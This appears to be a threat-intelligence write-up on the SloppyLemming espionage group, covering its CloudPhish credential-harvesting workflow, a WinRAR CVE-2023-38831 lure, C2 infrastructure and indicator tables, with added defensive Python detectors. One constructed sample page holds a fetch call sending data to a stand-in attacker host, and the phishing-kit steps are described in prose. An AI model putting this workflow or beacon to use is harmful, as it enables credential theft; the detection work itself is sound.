Cloudforce One has identified the cyber group “SloppyLemming,” responsible for extensive attacks across South Asia, particularly targeting Bangladesh, Pakistan, Sri Lanka, and China. The group uses cloud services for credential harvesting, malware distribution, and C2 activities, primarily affecting government, law enforcement, energy, telecom, and tech sectors. Linked to the APT group OUTRIDER TIGER, SloppyLemming frequently employs tools like Cobalt Strike and Havoc to target these regions.
How Credential Harvesting Works
SloppyLemming’s operations often begin with phishing campaigns, where carefully crafted emails are sent to potential victims. These emails are designed to trick the recipient into clicking a malicious link, leading to stolen login credentials. According to Cloudforce One, the actor tailors phishing emails to ensure a high success rate. An example obtained during the investigation reveals how meticulously the emails are designed to look legitimate, increasing the likelihood of their success.
The threat actor utilizes a custom-made tool called CloudPhish to deploy a malicious Cloudflare Worker. This worker manages the credential logging process and sends the stolen credentials back to the attacker. CloudPhish operates as follows:
The operator initiates CloudPhish by entering the following parameters:
- Mission name (usually referring to the operation’s target)
- Target URL
- Discord Webhook URL
- Redirect URL
- Cloudflare URL
Next, the tool:
- Scrapes the HTML content of the target’s webmail login page.
- Verifies whether the page belongs to a supported webmail client (such as Zimbra, Axigen, or cPanel).
- Replaces the legitimate code in the scraped webmail login page with a link directing users to a malicious Cloudflare Worker endpoint.
- Compiles the final Worker script.
- Inserts the fraudulent HTML code of the spoofed login page with a redirect to the attacker-controlled Worker.
- Implements credential logging and exfiltration via Discord.
Once ready, SloppyLemming operators send phishing emails to their targets. Upon receiving login credentials, the actor accesses the victim’s account to retrieve emails of interest. Cloudforce One obtained a copy of a likely actor-side script used to collect emails from compromised accounts, with key portions detailed below.
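The CloudPhish workflow described above leaves a recognisable trace in the cloned page itself: the login form, or a script on it, submits credentials to a Worker endpoint rather than to the webmail server the page imitates. The following added example (it is not code from Cloudforce One or from the actor's tooling) audits a scraped login page for exactly that pattern. The page URL, the HTML, and the `SUSPICIOUS_SUFFIXES` list are constructed for the demonstration.

```python
"""Flag a webmail login page whose credential submission leaves the page origin.

Added example, not code from the original write-up. It parses a saved login
page and reports every form action, script source, link or inline fetch/open
call that targets a workers.dev-style host, or (for the credential paths,
form actions and JS calls) any host other than the page's own origin.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Hosting suffixes a legitimate webmail form should never post to.
# Constructed list; extend it from your own telemetry.
SUSPICIOUS_SUFFIXES = (".workers.dev", ".pages.dev")


class _LoginPageScanner(HTMLParser):
    """Collects (kind, url) pairs for the attributes that can carry credentials."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.targets.append(("form-action", a["action"]))
        elif tag == "script" and a.get("src"):
            self.targets.append(("script-src", a["src"]))
        elif tag == "a" and a.get("href"):
            self.targets.append(("link", a["href"]))


# Inline JavaScript submission paths such as fetch("https://...") or xhr.open("POST", "...").
_FETCH_RE = re.compile(r"""(?:fetch|open)\(\s*(?:['"][A-Z]+['"]\s*,\s*)?['"]([^'"]+)['"]""")


def audit_login_page(page_url, html):
    """Return a list of (kind, host, reason) findings for one saved page."""
    page_host = (urlparse(page_url).hostname or "").lower()
    scanner = _LoginPageScanner()
    scanner.feed(html)
    for url in _FETCH_RE.findall(html):
        scanner.targets.append(("js-call", url))

    findings = []
    for kind, raw in scanner.targets:
        # Resolve relative URLs against the page so "/login" maps to the page host.
        host = (urlparse(urljoin(page_url, raw)).hostname or "").lower()
        if host.endswith(SUSPICIOUS_SUFFIXES):
            findings.append((kind, host, "worker-hosted endpoint"))
        elif kind in ("form-action", "js-call") and host != page_host:
            findings.append((kind, host, "credential path leaves page origin"))
    return findings


# Constructed sample: a cloned Zimbra-style page with an off-origin form and a beacon.
SAMPLE_PAGE_URL = "https://mail.example-gov.test/zimbra/"
SAMPLE_HTML = """
<html><body>
<form method="post" action="https://mail-example.login-abc.workers.dev/">
  <input name="username"><input name="password" type="password">
</form>
<a href="/zimbra/help">Help</a>
<script>
  fetch("https://collector.attacker.test/log", {method: "POST"});
</script>
</body></html>
"""

if __name__ == "__main__":
    for finding in audit_login_page(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(*finding)
```

The relative `/zimbra/help` link is resolved against the page URL and therefore not reported, while the form action and the inline `fetch` are. Running the same check over pages fetched from the domains in the indicator tables below, or over any page a user reports, gives an analyst a quick triage signal without executing the page's scripts.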
Malware Operations
In July 2024, cybersecurity experts from Cloudforce One discovered a malware campaign using Dropbox to exploit a vulnerability in older WinRAR versions (CVE-2023-38831). The operation, attributed to SloppyLemming, tricks users into downloading a RAR file named “CamScanner 06-10-2024 15.29.rar”, which contains malicious files disguised as PDFs.
When the archive is opened with a vulnerable version of WinRAR, an executable runs that downloads additional harmful components from Dropbox, including a Remote Access Tool (RAT). This RAT connects to a command server via Cloudflare Workers, posing a serious threat to users. Security experts advise updating WinRAR to a patched version to avoid such attacks.
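The file names in the table below show the layout this campaign relies on: a document-looking entry that shares its name with a folder, and a payload inside that folder named "document extension, space, executable extension". The following added example (not code from Cloudforce One) screens an archive listing for that layout. It works on entry names only, so the same function can be fed the output of any archive tool; the `SAMPLE_LISTING` is constructed and modelled on the names reported above.

```python
"""Screen an archive listing for the CVE-2023-38831 lure layout.

Added example, not from the original write-up. Two signals are checked on
entry names alone: a file whose name is reused by a folder (typically only a
trailing space apart), and an entry whose name ends in a document extension
followed by whitespace and an executable extension, e.g. "x.pdf .exe".
"""
import re

DOC_EXT = r"(?:pdf|docx?|xlsx?|pptx?|jpe?g|png|txt)"
EXEC_EXT = r"(?:exe|cmd|bat|scr|com|vbs|js|ps1|lnk)"
# "report.pdf .exe": document extension, whitespace, then an executable extension.
DOUBLE_EXT = re.compile(rf"\.{DOC_EXT}\s+\.{EXEC_EXT}$", re.IGNORECASE)


def find_lure_layout(names):
    """Return (reason, entry) findings for an archive listing.

    Directory entries are expected to end in "/", as most listing tools
    (and the ZIP/RAR formats themselves) present them.
    """
    findings = []
    dir_basenames = {
        n.rstrip("/").rsplit("/", 1)[-1].rstrip().lower()
        for n in names if n.endswith("/")
    }
    for n in names:
        if n.endswith("/"):
            continue
        base = n.rsplit("/", 1)[-1]
        if DOUBLE_EXT.search(base):
            findings.append(("document-then-executable extension", n))
        if base.rstrip().lower() in dir_basenames:
            findings.append(("file name shadowed by same-named folder", n))
    return findings


# Constructed listing, modelled on the CamScanner lure names in the table above
# (the real sample was a RAR; the names are all this check needs).
SAMPLE_LISTING = [
    "CamScanner 06-10-2024 15.29.pdf",
    "CamScanner 06-10-2024 15.29.pdf /",
    "CamScanner 06-10-2024 15.29.pdf /CamScanner 06-10-2024 15.29.pdf .exe",
    "readme.txt",
]

if __name__ == "__main__":
    for reason, entry in find_lure_layout(SAMPLE_LISTING):
        print(f"{reason}: {entry!r}")
```

A listing can be produced without extracting anything (for example from the archive's central directory or an `unrar l`-style command), so this check is safe to run in a mail-gateway or sandbox pre-filter. It complements rather than replaces patching: WinRAR 6.23 and later are not affected by CVE-2023-38831.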
| Filename | SHA256 Hash |
| --- | --- |
| CamScanner 06-10-2024 15.29.pdf | fb4397c837c7e401712764f953723153d5bb462bc944518959288ea47dec6446 |
| CamScanner 06-10-2024 15.29.pdf | 95cf90b2610c6f0ec67c1d669cd252468f6c3b8eaeea588f342d2bd74d90e093 |
| CamScanner 06-12-2024 15.29.pdf .exe | 337ca61e23bcb86f26dc40a36316621b74ec6f29a55820899ed30b03b69a6025 |
| CRYPTSP.dll | 82e99ceea9e6d31555b0f2bf637318fd97e5609e3d4d1341aec39db2e26cf211 |
Additional C2 Infrastructure And Traffic Analysis
Recent investigations into a domain associated with malicious activity, pitb.zapto[.]org, have revealed ties to an extensive network of cyber infrastructure. The domain currently resolves to an Alibaba IP address (47.74.10[.]112). These findings indicate actor-controlled infrastructure that may be part of broader cyber espionage operations; the related domains observed are:
- sco.zapto[.]org
- mofapak[.]info
- confidential.zapto[.]org
- humariweb[.]info
- modp-pk[.]org
- itsupport-gov[.]com
According to cybersecurity experts at Cloudforce One, the hacker group known as SloppyLemming has also used several domains, many of them fronted by Cloudflare’s reverse proxy services:
- apl-org[.]online
- apl-com[.]icu
- maldevfudding[.]com
- navybd-gov[.]info
- 168-gov[.]info
- aljazeerak[.]online
- adobefileshare[.]com
- crec-bd[.]site
- quran-books[.]store
- hurr.zapto[.]org
- hascolgov[.]info
- helpdesk-lab[.]site
A review of C2 (Command and Control) traffic between September 1st and 6th of 2024 showed significant activity across Pakistan, Bangladesh, and Sri Lanka, the group’s usual targets. A notable amount of traffic was also traced to Australian IP addresses, specifically in Canberra, which suggests the actor may be expanding their focus to government-related targets in Australia and highlights the evolving nature of their operations.
The majority of targeted organizations fall within the following categories:
- Government
- Law enforcement
- Defense
- Legislative organizations
- Foreign Affairs
- Transportation
- Logistics
- Technology
- IT providers
- Telecommunications
- Energy
- Construction
- Equipment operators
- Education
- Universities
The India-linked hacker group “SloppyLemming” has been conducting widespread cyberattacks across South Asia, targeting key sectors such as government, law enforcement, telecommunications, and technology. Utilizing tools like CloudPhish for credential harvesting and deploying malware through services like Dropbox and Cloudflare, the group focuses heavily on Pakistan, Bangladesh, and neighboring countries. Their operations include malware distribution, credential theft, and C2 traffic, with a notable expansion of activity to Australian IP addresses, indicating potential government-related targeting. The group’s evolving tactics and international reach make them a significant cybersecurity threat.
Indicators of Compromise
SloppyLemming Infrastructure
| Date Observed | Domain | IP Address |
| --- | --- | --- |
| 2024-09-03T21:50:47Z | www.crec-bd[.]site | 47.83.23.246 |
| 2024-09-03T21:48:50Z | crec-bd[.]site | 47.83.23.246 |
| 2024-08-22T08:17:15Z | jammycanonicalupdates[.]cloud | 159.65.6.251 |
| 2024-08-14T03:22:26Z | locaal.navybd-gov[.]info | 139.59.109.136 |
| 2024-08-12T07:56:35Z | maldevfudding[.]com | 37.27.41.167 |
| 2024-08-07T00:22:29Z | openkm.paknavy-pk[.]org | 47.237.105.113 |
| 2024-07-23T23:47:21Z | cloud.adobefileshare[.]com | 185.249.198.218 |
| 2024-07-23T23:41:37Z | adobefileshare[.]com | 185.249.198.218 |
| 2024-07-15T03:51:55Z | quran-books[.]store | 8.222.235.145 |
| 2024-07-09T23:33:39Z | aljazeerak[.]online | 8.219.169.226 |
| 2024-06-18T02:26:50Z | redzone2.apl-org[.]online | 47.237.20.135 |
| 2024-06-13T03:26:55Z | hurr.zapto[.]org | 47.237.20.135 |
| 2024-06-05T10:25:44Z | login.apl-org[.]online | 47.245.56.29 |
| 2024-05-30T04:08:00Z | helpdesk-lab[.]site | 47.237.20.201 |
| 2024-05-14T23:32:47Z | owa-spamcheck.apl-org[.]online | 47.237.25.198 |
| 2024-04-30T23:29:42Z | redzone.apl-org[.]online | 47.245.2.77 |
| 2024-04-30T23:28:35Z | dawn.apl-org[.]online | 47.237.25.198 |
| 2024-03-28T01:52:34Z | hit-pk[.]org | 208.85.22.252 |
| 2024-03-18T23:31:23Z | blabla.apl-com[.]icu | 8.219.114.124 |
| 2024-03-14T02:53:22Z | acrobat.paknavy-pk[.]org | 47.236.65.190 |
| 2024-03-14T02:40:17Z | paknavy-pk[.]org | 47.236.65.190 |
| 2024-03-10T20:55:07Z | mail.pakistangov[.]com | 47.245.114.11 |
| 2024-03-04T21:42:18Z | mail.apl-com[.]icu | 47.236.65.190 |
| 2024-02-27T23:16:44Z | 168-gov[.]info | 47.76.61.241 |
| 2024-02-27T22:10:28Z | www.168-gov[.]info | 47.76.61.241 |
| 2024-02-26T01:21:45Z | browser.apl-org[.]online | 149.28.153.250 |
| 2024-02-20T03:43:03Z | docs.apl-com[.]icu | 47.245.42.208 |
| 2024-02-07T22:54:18Z | new.apl-org[.]online | 47.74.84.168 |
| 2024-01-31T02:11:32Z | mozilla.apl-org[.]online | 47.74.87.155 |
| 2024-01-30T09:56:42Z | m.opensecurity-legacy[.]com | 159.253.120.25 |
| 2024-01-30T09:56:28Z | monitor.opensecurity-legacy[.]com | 159.253.120.25 |
| 2024-01-30T09:56:17Z | sensors.opensecurity-legacy[.]com | 159.253.120.25 |
| 2024-01-30T09:56:07Z | static.opensecurity-legacy[.]com | 159.253.120.25 |
| 2024-01-28T08:22:07Z | bin.opensecurity-legacy[.]com | 159.253.120.25 |
| 2024-01-28T08:09:48Z | api.opensecurity-legacy[.]com | 159.253.120.25 |
| 2024-01-28T08:09:28Z | frontend-m.opensecurity-legacy[.]com | 159.253.120.25 |
| 2024-01-28T08:09:16Z | accounts.opensecurity-legacy[.]com | 159.253.120.25 |
| 2024-01-28T08:02:58Z | opensecurity-legacy[.]com | 159.253.120.25 |
| 2024-01-09T21:14:22Z | oil.hascolgov[.]info | 207.148.73.145 |
| 2024-01-03T22:21:14Z | hesco.hascolgov[.]info | 207.148.73.145 |
| 2024-01-02T03:00:46Z | locall.hascolgov[.]info | 207.148.73.145 |
| 2023-12-27T22:46:34Z | itsupport-gov[.]com | 47.254.229.56 |
| 2023-12-18T01:00:57Z | updpcn[.]online | 47.76.181.76 |
| 2023-12-17T22:17:47Z | update.apl-org[.]online | 47.74.84.168 |
| 2023-12-05T22:27:17Z | zero-berlin-covenant.apl-org[.]online | 47.245.126.218 |
| 2023-11-30T23:19:46Z | fonts.apl-org[.]online | 47.74.87.155 |
| 2023-11-29T23:20:18Z | localhost.apl-com[.]icu | 142.93.139.164 |
| 2023-11-15T22:45:35Z | cloud.cflayerprotection[.]com | 45.137.116.8 |
| 2023-11-15T22:45:23Z | secure.cflayerprotection[.]com | 45.137.116.8 |
| 2023-11-15T22:42:39Z | cflayerprotection[.]com | 45.137.116.8 |
| 2023-10-15T23:44:47Z | data[.]cloudlflares[.]com | 45.137.116.8 |
| 2023-10-15T23:44:20Z | secure[.]cloudlflares[.]com | 45.137.116.8 |
| 2023-10-15T23:40:46Z | cloudlflares[.]com | 45.137.116.8 |
| 2023-10-15T23:40:46Z | www[.]cloudlflares[.]com | 45.137.116.8 |
SloppyLemming Malware Samples
| SHA256 Hash | Filename | C2 Address |
| --- | --- | --- |
| 06f82a8d80ec911498e3493ebefa8ad45e102dd887ce2edc11f8f51bafab2e80 | sspicli.dll | pitb.gov-pkgov.workers[.]dev |
| ac3dff91982709f575cfbc6954b61130b4eeab5d3759772db220f1b76836be4d | profapi.dll | pitb.gov-pkgov.workers[.]dev |
| 3dfb8d198de95090e2ad3ffc9d9846af5c3074563acb0ce5b0ef62b20e4bf432 | profapis.dll | pitb.gov-pkgov.workers[.]dev |
| 82e99ceea9e6d31555b0f2bf637318fd97e5609e3d4d1341aec39db2e26cf211 | CRYPTSP.dll | N/A |
| b6ae5b714f18ca40a111498d0991e1e30cd95317b4904d2ef0d49937f0552000 | Outlook.eml / NekroWire.dll | redzone.apl-org[.]online |
Mitigated SloppyLemming Workers Domains
- mail-na-gov-pk.na-gov-pk.workers[.]dev
- storage-e13.sharepoint-e13.workers[.]dev
- zoom.osutuga7.workers[.]dev
- sharepoint-punjab.sharepoint-e13.workers[.]dev
- pitb.gov-pkgov.workers[.]dev
- mail-islamabadpolice-gov-pk.ntc-telecommunication-safecity.workers[.]dev
- herald-b2a.workers[.]dev
- images-11d.workers[.]dev
- classifieds.workers[.]dev
- dawnnews.workers[.]dev
- aurora.dawn-904.workers[.]dev
- epaper.dawn-323.workers[.]dev
- obituary.workers[.]dev
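The indicators above are defanged with `[.]` and mix apex domains, subdomains and workers.dev hostnames, so matching them against DNS or proxy logs needs a refang step and a parent-domain walk (a hit on `apl-org[.]online` should also catch `login.apl-org.online`). The following added example (not code from Cloudforce One) does that over a handful of constructed log lines. The `DEFANGED` list is a subset of the indicators on this page; the log lines, the `updates.example-3f1.workers.dev` host and the field layout are constructed.

```python
"""Match defanged indicators from the tables above against DNS/proxy log lines.

Added example, not from the original write-up. A host matches if it, or any
parent domain of it, is in the indicator set. Any other *.workers.dev host is
surfaced separately for review, because the actor favoured that hosting and
the mitigated list is a point-in-time snapshot.
"""

# Subset of the indicators on this page, copied in their defanged form.
DEFANGED = """
pitb.zapto[.]org
sco.zapto[.]org
mofapak[.]info
apl-org[.]online
apl-com[.]icu
maldevfudding[.]com
hascolgov[.]info
pitb.gov-pkgov.workers[.]dev
mail-na-gov-pk.na-gov-pk.workers[.]dev
zoom.osutuga7.workers[.]dev
""".split()


def refang(indicator):
    """Turn 'example[.]com' back into a matchable lowercase hostname."""
    return indicator.replace("[.]", ".").replace("[:]", ":").lower().rstrip(".")


INDICATORS = {refang(i) for i in DEFANGED}


def parent_domains(host):
    """Yield the host and each of its parents: a.b.c -> a.b.c, b.c, c."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        yield ".".join(labels[i:])


# Constructed log lines in the layout "<timestamp> <client-ip> <host> <method>".
SAMPLE_LOG = """
2024-09-02T10:14:03Z 10.0.4.21 login.apl-org.online GET
2024-09-02T10:14:09Z 10.0.4.21 www.example-gov.test GET
2024-09-03T08:01:44Z 10.0.7.9 pitb.gov-pkgov.workers.dev POST
2024-09-03T08:02:10Z 10.0.7.9 assets.example-cdn.test GET
2024-09-04T16:40:12Z 10.0.2.3 zoom.osutuga7.workers.dev POST
2024-09-05T09:12:51Z 10.0.2.3 updates.example-3f1.workers.dev POST
""".strip().splitlines()

HOST_FIELD = 2  # zero-based index of the hostname in the constructed layout


def match_log(lines, indicators=INDICATORS):
    """Return (host, verdict) pairs for lines that hit an indicator or need review."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) <= HOST_FIELD:
            continue  # malformed line; skip rather than guess
        host = parts[HOST_FIELD].lower()
        matched = next((d for d in parent_domains(host) if d in indicators), None)
        if matched:
            hits.append((host, "indicator:" + matched))
        elif host.endswith(".workers.dev"):
            hits.append((host, "review:unlisted workers.dev host"))
    return hits


if __name__ == "__main__":
    for host, verdict in match_log(SAMPLE_LOG):
        print(f"{verdict:45} {host}")
```

The parent-domain walk is deliberate: the infrastructure table lists many subdomains under a few apexes (`apl-org[.]online`, `opensecurity-legacy[.]com`, `hascolgov[.]info`), so matching on the apex catches hosts that were not individually recorded. The separate "review" verdict for unlisted workers.dev hosts is a triage aid, not a block decision, since legitimate services use that hosting too.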